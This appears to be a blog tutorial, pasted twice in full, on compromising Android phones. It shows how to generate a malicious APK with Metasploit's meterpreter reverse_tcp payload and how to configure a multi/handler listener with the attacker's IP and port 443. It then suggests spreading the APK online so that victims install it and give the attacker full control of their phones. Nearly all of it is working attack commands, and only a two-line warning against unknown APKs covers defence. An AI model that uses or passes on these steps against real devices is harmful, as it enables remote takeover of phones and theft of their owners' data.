Nowadays mobile users are increasing day by day, the security threat
is also increasing together with the growth of its users. Our
tutorial for today is how to
Hacking Android Smartphone
Tutorial using Metasploit. Why we choose android phone for this
tutorial?
simply because lately android phone growing very fast worldwide. Here
in China you can get android phone for only US$ 30 it's one of the
reason why android growing fast.
What is android? according to
wikipedia:
Android is an operating system based on the Linux kernel, and designed
primarily for touchscreen mobile devices such as smartphones and tablet
computers. Initially developed by Android, Inc., which Google backed
financially and later bought in 2005, Android was unveiled in 2007 along
with the founding of the Open Handset Alliance: a consortium of
hardware, software, and telecommunication companies devoted to advancing
open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to
distribute and install application software and middleware onto Google's
Android operating system; very similar to an MSI package in Windows or a
Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this
tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this
tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view
tutorial how to
create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this
tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim
to connect back to attacker machine, attacker needs to set up the
handler to handle incoming connections to the port already specified
above. Type
msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start
distribute it (I don't need to describe how to distribute this file,
internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's
file and install it. After victim open the application, attacker
Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step
Hacking Android Smartphone
Tutorial using Metasploit above:
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure
you can view, read and examine the source code. The picture below is the
source code of our malicious APK's in this
tutorial.
Share this post if you found it useful
Nowadays mobile users are increasing day by day, the security threat
is also increasing together with the growth of its users. Our
tutorial for today is how to
Hacking Android Smartphone
Tutorial using Metasploit. Why we choose android phone for this
tutorial?
simply because lately android phone growing very fast worldwide. Here
in China you can get android phone for only US$ 30 it's one of the
reason why android growing fast.
What is android? according to
wikipedia:
Android is an operating system based on the Linux kernel, and designed
primarily for touchscreen mobile devices such as smartphones and tablet
computers. Initially developed by Android, Inc., which Google backed
financially and later bought in 2005, Android was unveiled in 2007 along
with the founding of the Open Handset Alliance: a consortium of
hardware, software, and telecommunication companies devoted to advancing
open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to
distribute and install application software and middleware onto Google's
Android operating system; very similar to an MSI package in Windows or a
Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this
tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this
tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view
tutorial how to
create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this
tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim
to connect back to attacker machine, attacker needs to set up the
handler to handle incoming connections to the port already specified
above. Type
msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start
distribute it (I don't need to describe how to distribute this file,
internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's
file and install it. After victim open the application, attacker
Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step
Hacking Android Smartphone
Tutorial using Metasploit above:
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure
you can view, read and examine the source code. The picture below is the
source code of our malicious APK's in this
tutorial.
Share this post if you found it useful